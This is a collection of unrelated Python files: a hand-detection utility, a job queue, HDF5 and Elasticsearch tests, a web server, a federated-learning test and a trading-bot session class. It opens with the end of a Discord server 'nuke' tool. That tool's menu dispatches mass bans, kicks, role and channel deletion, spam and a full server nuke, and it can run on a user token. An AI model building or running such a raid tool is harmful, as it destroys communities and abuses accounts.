{self.colour}║ \033[37m[{self.colour}4\033[37m] \033[37mDelete Roles {self.colour}║\033[37m [{self.colour}8\033[37m] \033[37mNuke Server {self.colour}║\033[37m [{self.colour}X\033[37m] \033[37mExit {self.colour}║\033[37m
{self.colour}╚═══════════════════════╩═══════════════════════╩═══════════════════════╝\033[37m
\033[37m''')
choice = input(f'{self.colour}> \033[37mChoice{self.colour}: \033[37m')
if choice == '1':
await self.BanExecute()
time.sleep(2)
await self.Menu()
elif choice == '2':
await self.KickExecute()
time.sleep(2)
await self.Menu()
elif choice == '3':
await PruneMembers()
time.sleep(2)
await self.Menu()
elif choice == '4':
await self.RoleDeleteExecute()
time.sleep(2)
await self.Menu()
elif choice == '5':
await self.ChannelDeleteExecute()
time.sleep(2)
await self.Menu()
elif choice == '6':
await self.RoleSpamExecute()
time.sleep(2)
await self.Menu()
elif choice == '7':
await self.ChannelSpamExecute()
time.sleep(2)
await self.Menu()
elif choice == '8':
await self.NukeExecute()
time.sleep(2)
await self.Menu()
elif choice == '9':
await self.Scrape()
time.sleep(3)
await self.Menu()
elif choice == '0':
await self.ThemeChanger()
elif choice == 'C' or choice == 'c':
self.Credits()
input()
await self.Menu()
elif choice == 'X' or choice == 'x':
os._exit(0)
@client.event
async def on_ready():
await Avery().Menu()
def Startup(self):
try:
if token_type == "user":
client.run(token, bot=False)
elif token_type == "bot":
client.run(token)
except:
print(f'{self.colour}> \033[37mInvalid Token')
input()
os._exit(0)
if __name__ == "__main__":
Avery().Startup()
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.20
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen infrerence graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.compat.v1.GraphDef()
with tf.compat.v2.io.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.compat.v1.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
print(scores[i])
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
def draw_names(name, image_np, x, y):
cv2.putText(image_np, name, (x, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.65, (100, 150, 200), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
ppequeue.py
|
from concurrent import futures
import queue
import threading
import time
class JobManager(object):
def __init__(self,jobs):
self.jobs=jobs
self.result=queue.Queue()
self.threads=[]
self.process_task_done=False
self.init_threads()
def init_threads(self):
t=threading.Thread(target=self.process_jobs)
self.threads.append(t)
for t in self.threads:
t.start()
def process_jobs(self):
def pull_job():
while not self.jobs.empty():
job=self.jobs.get()
yield job
executor=futures.ProcessPoolExecutor()
fs=[executor.submit(do_somethind,job) for job in pull_job()]
for f in futures.as_completed(fs):
self.result.put(f.result())
self.process_task_done=True
def pull(self):
while True:
if self.process_task_done and self.result.empty():
break
res=self.result.get()
yield res
def do_somethind(i):
print('do_somethind',i)
time.sleep(2)
return i
def main():
que=queue.Queue()
for i in range(30):
que.put(i)
job_manager=JobManager(que)
get=[]
for res in job_manager.pull():
print('get',res)
get.append(res)
print(sorted(get))
if __name__ == '__main__':
main()
|
verify.py
|
from sec2j import sec2j
from multiprocessing import Process, Queue
import os
import time
import numpy as np
import h5py
import sys
import random
def write_h5file(q):
# print 'Here'
fname = '/home/adaszews/mnt/mouse_brain/scratch/test.h5'
if os.path.exists(fname):
os.unlink(fname)
if os.path.exists(fname + '.journal'):
os.unlink(fname + '.journal')
f = sec2j.open(fname)
# print 'Here 2'
cnt = 0
while True:
try:
a = q.get(False)
print 'sec2j.set_exit()'
sec2j.set_exit(-1)
except:
pass
print '*',
sys.stdout.flush()
sec2j.tx_start(f.id.id)
g = f.require_group('dupa/%d' % cnt)
d = g.create_dataset('data', shape=(100, 100, 100), dtype=np.uint8)
d[:, :, :] = np.random.random([100, 100, 100])
cnt += 1
print 'Finishing'
sec2j.tx_end(f.id.id)
f.flush()
f.close()
def main():
print 'Testing different kill times'
n = 3
histo = [0] * n
for i in range(2, n):
print 'i:', i
for k in range(0, 1):
q = Queue()
p = Process(target=write_h5file, args=(q,))
p.start()
# time.sleep(0.05 * i)
q.put(1)
p.join()
try:
f = h5py.File('test.h5', 'r')
f.close()
except:
print 'Broken'
histo[i] += 1
print histo
if __name__ == '__main__':
main()
|
test_elasticsearch.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
from ast import literal_eval
from unittest import mock
import elasticsearch
import elasticsearch.exceptions
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import opentelemetry.instrumentation.elasticsearch
from opentelemetry.instrumentation.elasticsearch import (
ElasticsearchInstrumentor,
)
from opentelemetry.test.test_base import TestBase
from opentelemetry.trace.status import StatusCode
major_version = elasticsearch.VERSION[0]
if major_version == 7:
from . import helpers_es7 as helpers # pylint: disable=no-name-in-module
elif major_version == 6:
from . import helpers_es6 as helpers # pylint: disable=no-name-in-module
elif major_version == 5:
from . import helpers_es5 as helpers # pylint: disable=no-name-in-module
else:
from . import helpers_es2 as helpers # pylint: disable=no-name-in-module
Article = helpers.Article
@mock.patch(
"elasticsearch.connection.http_urllib3.Urllib3HttpConnection.perform_request"
)
class TestElasticsearchIntegration(TestBase):
def setUp(self):
super().setUp()
self.tracer = self.tracer_provider.get_tracer(__name__)
ElasticsearchInstrumentor().instrument()
def tearDown(self):
super().tearDown()
with self.disable_logging():
ElasticsearchInstrumentor().uninstrument()
def get_ordered_finished_spans(self):
return sorted(
self.memory_exporter.get_finished_spans(),
key=lambda s: s.start_time,
)
def test_instrumentor(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
# Check version and name in span's instrumentation info
# self.check_span_instrumentation_info(span, opentelemetry.instrumentation.elasticsearch)
self.check_span_instrumentation_info(
span, opentelemetry.instrumentation.elasticsearch
)
# check that no spans are generated after uninstrument
ElasticsearchInstrumentor().uninstrument()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_span_not_recording(self, request_mock):
request_mock.return_value = (1, {}, {})
mock_tracer = mock.Mock()
mock_span = mock.Mock()
mock_span.is_recording.return_value = False
mock_tracer.start_span.return_value = mock_span
mock_tracer.use_span.return_value.__enter__ = mock_span
mock_tracer.use_span.return_value.__exit__ = mock_span
with mock.patch("opentelemetry.trace.get_tracer") as tracer:
tracer.return_value = mock_tracer
Elasticsearch()
self.assertFalse(mock_span.is_recording())
self.assertTrue(mock_span.is_recording.called)
self.assertFalse(mock_span.set_attribute.called)
self.assertFalse(mock_span.set_status.called)
ElasticsearchInstrumentor().uninstrument()
def test_prefix_arg(self, request_mock):
prefix = "prefix-from-env"
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor(span_name_prefix=prefix).instrument()
request_mock.return_value = (1, {}, {})
self._test_prefix(prefix)
def test_prefix_env(self, request_mock):
prefix = "prefix-from-args"
env_var = "OTEL_PYTHON_ELASTICSEARCH_NAME_PREFIX"
os.environ[env_var] = prefix
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor().instrument()
request_mock.return_value = (1, {}, {})
del os.environ[env_var]
self._test_prefix(prefix)
def _test_prefix(self, prefix):
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertTrue(span.name.startswith(prefix))
def test_result_values(self, request_mock):
request_mock.return_value = (
1,
{},
'{"found": false, "timed_out": true, "took": 7}',
)
es = Elasticsearch()
es.get(index="test-index", doc_type="tweet", id=1)
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
self.assertEqual("False", spans[0].attributes["elasticsearch.found"])
self.assertEqual(
"True", spans[0].attributes["elasticsearch.timed_out"]
)
self.assertEqual("7", spans[0].attributes["elasticsearch.took"])
def test_trace_error_unknown(self, request_mock):
exc = RuntimeError("custom error")
request_mock.side_effect = exc
self._test_trace_error(StatusCode.ERROR, exc)
def test_trace_error_not_found(self, request_mock):
msg = "record not found"
exc = elasticsearch.exceptions.NotFoundError(404, msg)
request_mock.return_value = (1, {}, {})
request_mock.side_effect = exc
self._test_trace_error(StatusCode.ERROR, exc)
def _test_trace_error(self, code, exc):
es = Elasticsearch()
try:
es.get(index="test-index", doc_type="tweet", id=1)
except Exception: # pylint: disable=broad-except
pass
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
self.assertFalse(span.status.is_ok)
self.assertEqual(span.status.status_code, code)
self.assertEqual(span.status.description, str(exc))
def test_parent(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
with self.tracer.start_as_current_span("parent"):
es.index(
index="sw", doc_type="people", id=1, body={"name": "adam"}
)
spans = self.get_ordered_finished_spans()
self.assertEqual(len(spans), 2)
self.assertEqual(spans[0].name, "parent")
self.assertEqual(spans[1].name, "Elasticsearch/sw/people/1")
self.assertIsNotNone(spans[1].parent)
self.assertEqual(spans[1].parent.span_id, spans[0].context.span_id)
def test_multithread(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
ev = threading.Event()
# 1. Start tracing from thread-1; make thread-2 wait
# 2. Trace something from thread-2, make thread-1 join before finishing.
# 3. Check the spans got different parents, and are in the expected order.
def target1(parent_span):
with self.tracer.use_span(parent_span):
es.get(index="test-index", doc_type="tweet", id=1)
ev.set()
ev.wait()
def target2():
ev.wait()
es.get(index="test-index", doc_type="tweet", id=2)
ev.set()
with self.tracer.start_as_current_span("parent") as span:
t1 = threading.Thread(target=target1, args=(span,))
t1.start()
t2 = threading.Thread(target=target2)
t2.start()
t1.join()
t2.join()
spans = self.get_ordered_finished_spans()
self.assertEqual(3, len(spans))
s1, s2, s3 = spans
self.assertEqual(s1.name, "parent")
self.assertEqual(s2.name, "Elasticsearch/test-index/tweet/1")
self.assertIsNotNone(s2.parent)
self.assertEqual(s2.parent.span_id, s1.context.span_id)
self.assertEqual(s3.name, "Elasticsearch/test-index/tweet/2")
self.assertIsNone(s3.parent)
def test_dsl_search(self, request_mock):
request_mock.return_value = (1, {}, '{"hits": {"hits": []}}')
client = Elasticsearch()
search = Search(using=client, index="test-index").filter(
"term", author="testing"
)
search.execute()
spans = self.get_ordered_finished_spans()
span = spans[0]
self.assertEqual(1, len(spans))
self.assertEqual(span.name, "Elasticsearch/test-index/_search")
self.assertIsNotNone(span.end_time)
self.assertEqual(
span.attributes,
{
"db.system": "elasticsearch",
"elasticsearch.url": "/test-index/_search",
"elasticsearch.method": helpers.dsl_search_method,
"db.statement": str(
{
"query": {
"bool": {
"filter": [{"term": {"author": "testing"}}]
}
}
}
),
},
)
def test_dsl_create(self, request_mock):
request_mock.return_value = (1, {}, {})
client = Elasticsearch()
Article.init(using=client)
spans = self.get_ordered_finished_spans()
self.assertEqual(2, len(spans))
span1, span2 = spans
self.assertEqual(span1.name, "Elasticsearch/test-index")
self.assertEqual(
span1.attributes,
{
"db.system": "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "HEAD",
},
)
self.assertEqual(span2.name, "Elasticsearch/test-index")
attributes = {
"db.system": "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "PUT",
}
self.assert_span_has_attributes(span2, attributes)
self.assertEqual(
literal_eval(span2.attributes["db.statement"]),
helpers.dsl_create_statement,
)
def test_dsl_index(self, request_mock):
request_mock.return_value = helpers.dsl_index_result
client = Elasticsearch()
article = Article(
meta={"id": 2},
title="About searching",
body="A few words here, a few words there",
)
res = article.save(using=client)
self.assertTrue(res)
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
self.assertEqual(span.name, helpers.dsl_index_span_name)
attributes = {
"db.system": "elasticsearch",
"elasticsearch.url": helpers.dsl_index_url,
"elasticsearch.method": "PUT",
}
self.assert_span_has_attributes(span, attributes)
self.assertEqual(
literal_eval(span.attributes["db.statement"]),
{
"body": "A few words here, a few words there",
"title": "About searching",
},
)
|
webserve.py
|
import sys
import os
import base64
import threading
import ssl
import socketserver
#import BaseHTTPServer
#from SimpleHTTPServer import SimpleHTTPRequestHandler
from http.server import SimpleHTTPRequestHandler
from importlib import reload
WEB_PORT=5000
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def log_request(self, *args, **kwargs):
pass
class WebHandler(SimpleHTTPRequestHandler):
def do_GET(self):
import webhandle
reload(webhandle)
webhandle.do_get(self)
def do_POST(self):
import webhandle
reload(webhandle)
webhandle.do_post(self)
SERVER=None
def serve_http(https_port=80, HandlerClass = WebHandler):
global SERVER
socketserver.TCPServer.allow_reuse_address = True
httpd = ThreadedTCPServer(("", https_port), HandlerClass)
debug("Serving HTTP on", https_port)
SERVER = httpd
SERVER.serve_forever()
def debug(*args):
print(" ".join(map(str, args)))
def start():
port = int(WEB_PORT)
def run_webserve():
serve_http(port)
web_thread = threading.Thread(target=run_webserve)
web_thread.daemon = True
web_thread.start()
return web_thread
def stop():
SERVER.shutdown()
SERVER.server_close()
def restart():
stop()
start()
def main():
t = start()
import helpers
# TODO: add argument parsing with argparse
helpers.select_embedding()
while True:
t.join(0.5)
if not t.isAlive():
print("WEBSERVER DIED, EXITING")
break
if __name__ == '__main__':
main()
|
test_data_join_worker.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
import threading
from os import listdir
from os.path import isfile, join
import time
import random
import logging
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import unittest
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
import numpy as np
import tensorflow_io
from tensorflow.compat.v1 import gfile
from google.protobuf import text_format, empty_pb2, timestamp_pb2
import grpc
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import data_join_service_pb2 as dj_pb
from fedlearner.common import data_join_service_pb2_grpc as dj_grpc
from fedlearner.common.db_client import DBClient
from fedlearner.proxy.channel import make_insecure_channel, ChannelType
from fedlearner.data_join import (
data_block_manager, common,
data_join_master, data_join_worker,
raw_data_visitor, raw_data_publisher
)
from fedlearner.data_join.data_block_manager import DataBlockBuilder
from fedlearner.data_join.raw_data_iter_impl.tf_record_iter import TfExampleItem
class DataJoinWorker(unittest.TestCase):
def setUp(self):
self.kvstore_type = 'etcd'
self.leader_base_dir = 'bytefl_l'
self.follower_base_dir = 'bytefl_f'
data_source_name = 'test_data_source'
os.environ['ETCD_BASE_DIR'] = self.leader_base_dir
kvstore_l = DBClient(self.kvstore_type, True)
os.environ['ETCD_BASE_DIR'] = self.follower_base_dir
kvstore_f = DBClient(self.kvstore_type, True)
kvstore_l.delete_prefix(common.data_source_kvstore_base_dir(data_source_name))
kvstore_f.delete_prefix(common.data_source_kvstore_base_dir(data_source_name))
data_source_l = common_pb.DataSource()
self.raw_data_pub_dir_l = './raw_data_pub_dir_l'
data_source_l.raw_data_sub_dir = self.raw_data_pub_dir_l
data_source_l.role = common_pb.FLRole.Leader
data_source_l.state = common_pb.DataSourceState.Init
data_source_l.output_base_dir = "./ds_output_l"
self.raw_data_dir_l = "./raw_data_l"
data_source_f = common_pb.DataSource()
self.raw_data_pub_dir_f = './raw_data_pub_dir_f'
data_source_f.role = common_pb.FLRole.Follower
data_source_f.raw_data_sub_dir = self.raw_data_pub_dir_f
data_source_f.state = common_pb.DataSourceState.Init
data_source_f.output_base_dir = "./ds_output_f"
self.raw_data_dir_f = "./raw_data_f"
data_source_meta = common_pb.DataSourceMeta()
data_source_meta.name = data_source_name
data_source_meta.partition_num = 2
data_source_meta.start_time = 0
data_source_meta.end_time = 100000000
data_source_l.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(kvstore_l, data_source_l)
data_source_f.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(kvstore_f, data_source_f)
self.kvstore_l = kvstore_l
self.kvstore_f = kvstore_f
self.data_source_l = data_source_l
self.data_source_f = data_source_f
self.data_source_name = data_source_name
self.raw_data_publisher_l = raw_data_publisher.RawDataPublisher(
self.kvstore_l, self.raw_data_pub_dir_l
)
self.raw_data_publisher_f = raw_data_publisher.RawDataPublisher(
self.kvstore_f, self.raw_data_pub_dir_f
)
if gfile.Exists(data_source_l.output_base_dir):
gfile.DeleteRecursively(data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(data_source_f.output_base_dir):
gfile.DeleteRecursively(data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.worker_options = dj_pb.DataJoinWorkerOptions(
use_mock_etcd=True,
raw_data_options=dj_pb.RawDataOptions(
raw_data_iter='TF_RECORD',
read_ahead_size=1<<20,
read_batch_size=128,
optional_fields=['label']
),
example_id_dump_options=dj_pb.ExampleIdDumpOptions(
example_id_dump_interval=1,
example_id_dump_threshold=1024
),
example_joiner_options=dj_pb.ExampleJoinerOptions(
example_joiner='STREAM_JOINER',
min_matching_window=64,
max_matching_window=256,
data_block_dump_interval=30,
data_block_dump_threshold=1000
),
batch_processor_options=dj_pb.BatchProcessorOptions(
batch_size=512,
max_flying_item=2048
),
data_block_builder_options=dj_pb.WriterOptions(
output_writer='TF_RECORD'
)
)
self.total_index = 1 << 12
def generate_raw_data(self, start_index, kvstore, rdp, data_source, raw_data_base_dir, partition_id,
block_size, shuffle_win_size, feat_key_fmt, feat_val_fmt):
dbm = data_block_manager.DataBlockManager(data_source, partition_id)
raw_data_dir = os.path.join(raw_data_base_dir,
common.partition_repr(partition_id))
if not gfile.Exists(raw_data_dir):
gfile.MakeDirs(raw_data_dir)
useless_index = 0
new_raw_data_fnames = []
for block_index in range(start_index // block_size, (start_index + self.total_index) // block_size):
builder = DataBlockBuilder(
raw_data_base_dir,
data_source.data_source_meta.name,
partition_id, block_index,
dj_pb.WriterOptions(output_writer='TF_RECORD'), None
)
cands = list(range(block_index * block_size, (block_index + 1) * block_size))
start_index = cands[0]
for i in range(len(cands)):
if random.randint(1, 4) > 2:
continue
a = random.randint(i - shuffle_win_size, i + shuffle_win_size)
b = random.randint(i - shuffle_win_size, i + shuffle_win_size)
if a < 0:
a = 0
if a >= len(cands):
a = len(cands) - 1
if b < 0:
b = 0
if b >= len(cands):
b = len(cands) - 1
if (abs(cands[a]-i-start_index) <= shuffle_win_size and
abs(cands[b]-i-start_index) <= shuffle_win_size):
cands[a], cands[b] = cands[b], cands[a]
for example_idx in cands:
feat = {}
example_id = '{}'.format(example_idx).encode()
feat['example_id'] = tf.train.Feature(
bytes_list=tf.train.BytesList(value=[example_id]))
event_time = 150000000 + example_idx
feat['event_time'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[event_time]))
label = random.choice([1, 0])
if random.random() < 0.8:
feat['label'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[label]))
feat[feat_key_fmt.format(example_idx)] = tf.train.Feature(
bytes_list=tf.train.BytesList(
value=[feat_val_fmt.format(example_idx).encode()]))
example = tf.train.Example(features=tf.train.Features(feature=feat))
builder.append_item(TfExampleItem(example.SerializeToString()),
useless_index, useless_index)
useless_index += 1
meta = builder.finish_data_block()
fname = common.encode_data_block_fname(
data_source.data_source_meta.name,
meta
)
new_raw_data_fnames.append(os.path.join(raw_data_dir, fname))
fpaths = [os.path.join(raw_data_dir, f)
for f in gfile.ListDirectory(raw_data_dir)
if not gfile.IsDirectory(os.path.join(raw_data_dir, f))]
for fpath in fpaths:
if fpath.endswith(common.DataBlockMetaSuffix):
gfile.Remove(fpath)
rdp.publish_raw_data(partition_id, new_raw_data_fnames)
def test_all_assembly(self):
for i in range(3):
logging.info('Testing round %d', i + 1)
self._inner_test_round(i*self.total_index)
def _inner_test_round(self, start_index):
for i in range(self.data_source_l.data_source_meta.partition_num):
self.generate_raw_data(
start_index, self.kvstore_l, self.raw_data_publisher_l,
self.data_source_l, self.raw_data_dir_l, i, 2048, 64,
'leader_key_partition_{}'.format(i) + ':{}',
'leader_value_partition_{}'.format(i) + ':{}'
)
self.generate_raw_data(
start_index, self.kvstore_f, self.raw_data_publisher_f,
self.data_source_f, self.raw_data_dir_f, i, 4096, 128,
'follower_key_partition_{}'.format(i) + ':{}',
'follower_value_partition_{}'.format(i) + ':{}'
)
master_addr_l = 'localhost:4061'
master_addr_f = 'localhost:4062'
master_options = dj_pb.DataJoinMasterOptions(use_mock_etcd=True,
batch_mode=True)
os.environ['ETCD_BASE_DIR'] = self.leader_base_dir
master_l = data_join_master.DataJoinMasterService(
int(master_addr_l.split(':')[1]), master_addr_f,
self.data_source_name, self.kvstore_type,
master_options,
)
master_l.start()
os.environ['ETCD_BASE_DIR'] = self.follower_base_dir
master_f = data_join_master.DataJoinMasterService(
int(master_addr_f.split(':')[1]), master_addr_l,
self.data_source_name, self.kvstore_type,
master_options
)
master_f.start()
channel_l = make_insecure_channel(master_addr_l, ChannelType.INTERNAL)
master_client_l = dj_grpc.DataJoinMasterServiceStub(channel_l)
channel_f = make_insecure_channel(master_addr_f, ChannelType.INTERNAL)
master_client_f = dj_grpc.DataJoinMasterServiceStub(channel_f)
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Processing and \
dss_f.state == common_pb.DataSourceState.Processing:
break
except Exception as e:
pass
time.sleep(2)
worker_addr_l = 'localhost:4161'
worker_addr_f = 'localhost:4162'
os.environ['ETCD_BASE_DIR'] = self.leader_base_dir
worker_l = data_join_worker.DataJoinWorkerService(
int(worker_addr_l.split(':')[1]),
worker_addr_f, master_addr_l, 0,
self.kvstore_type, self.worker_options
)
os.environ['ETCD_BASE_DIR'] = self.follower_base_dir
worker_f = data_join_worker.DataJoinWorkerService(
int(worker_addr_f.split(':')[1]),
worker_addr_l, master_addr_f, 0,
self.kvstore_type, self.worker_options
)
th_l = threading.Thread(target=worker_l.run, name='worker_l')
th_f = threading.Thread(target=worker_f.run, name='worker_f')
th_l.start()
th_f.start()
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Ready and \
dss_f.state == common_pb.DataSourceState.Ready:
break
except Exception as e: #xx
pass
time.sleep(2)
th_l.join()
th_f.join()
master_l.stop()
master_f.stop()
def tearDown(self):
if gfile.Exists(self.data_source_l.output_base_dir):
gfile.DeleteRecursively(self.data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(self.data_source_f.output_base_dir):
gfile.DeleteRecursively(self.data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.kvstore_f.delete_prefix(common.data_source_kvstore_base_dir(self.leader_base_dir))
self.kvstore_l.delete_prefix(common.data_source_kvstore_base_dir(self.follower_base_dir))
if __name__ == '__main__':
unittest.main()
|
local.py
|
from TradzQAI.core import Local_Worker, Local_env
from TradzQAI.core.environnement.base import dataLoader
from TradzQAI.tools import Saver, Logger, red
import time, os
from threading import Thread
class Local_session(Thread):
def __init__(self, mode="train", contract_type="classic", config='config/', db=None, agent="PPO"):
self.db = db
if not "/" in config[len(config)-1]:
raise ValueError("You forget \"/\" at the end, it should be {}/".format(config))
self.env = None
self.mode = mode
self.contract_type = contract_type
self.config = config
self.agent = None
self.worker = None
self.saver = Saver()
self.logger = None
self.dl = None
self.settings = dict()
if self.saver.check_settings_files(config):
self.settings['env'], self.settings['agent'], self.settings['network'] = self.saver.load_settings(config)
self.logger = Logger()
self.dl = dataLoader(directory=self.settings['env']['base']['data_directory'], mode=self.mode)
#self.settings['env']['base'].pop('data_directory')
self.saver._check(self.settings['agent']['type'].split('_')[0].upper(), self.settings)
else:
self.initEnv()
default_env, default_network = self.env.get_default_settings()
self.saver.save_settings(default_env,
getattr(__import__('TradzQAI'), agent).get_specs(),
default_network, config)
Thread.__init__(self)
def stop(self):
self.env.close()
self.logger.stop()
def getWorker(self):
return self.worker
def getEnv(self):
return self.env
def getAgent(self):
return self.agent
def setAgent(self, agent=None, device=None):
if agent:
self.env.model_name = agent
if self.settings['agent']['type'].split('_')[0].upper() in self.src_agents():
import warnings
with warnings.catch_warnings():
warnings.filterwarnings("ignore",category=FutureWarning)
from TradzQAI.agents.agent import Agent
self.agent = Agent
self.device = device
else:
raise ValueError('could not import %s' % self.settings['agent']['type'].split('_')[0].upper())
def loadSession(self):
if not self.env:
self.initEnv()
if not self.env.stop:
self.initAgent()
self.initWorker()
else:
print (red("Warning : ")+"You cannot start the session without setting, "+\
"any data directory in {}environnement".format(self.config))
def src_agents(self):
ignore = ['Agent.py', '__init__.py', '__pycache__']
valid = []
for f in os.listdir("TradzQAI/agents"):
if f not in ignore:
valid.append(f.replace(".py", ""))
return valid
def initAgent(self):
if not self.agent:
self.setAgent()
for classe in self.agent.__mro__:
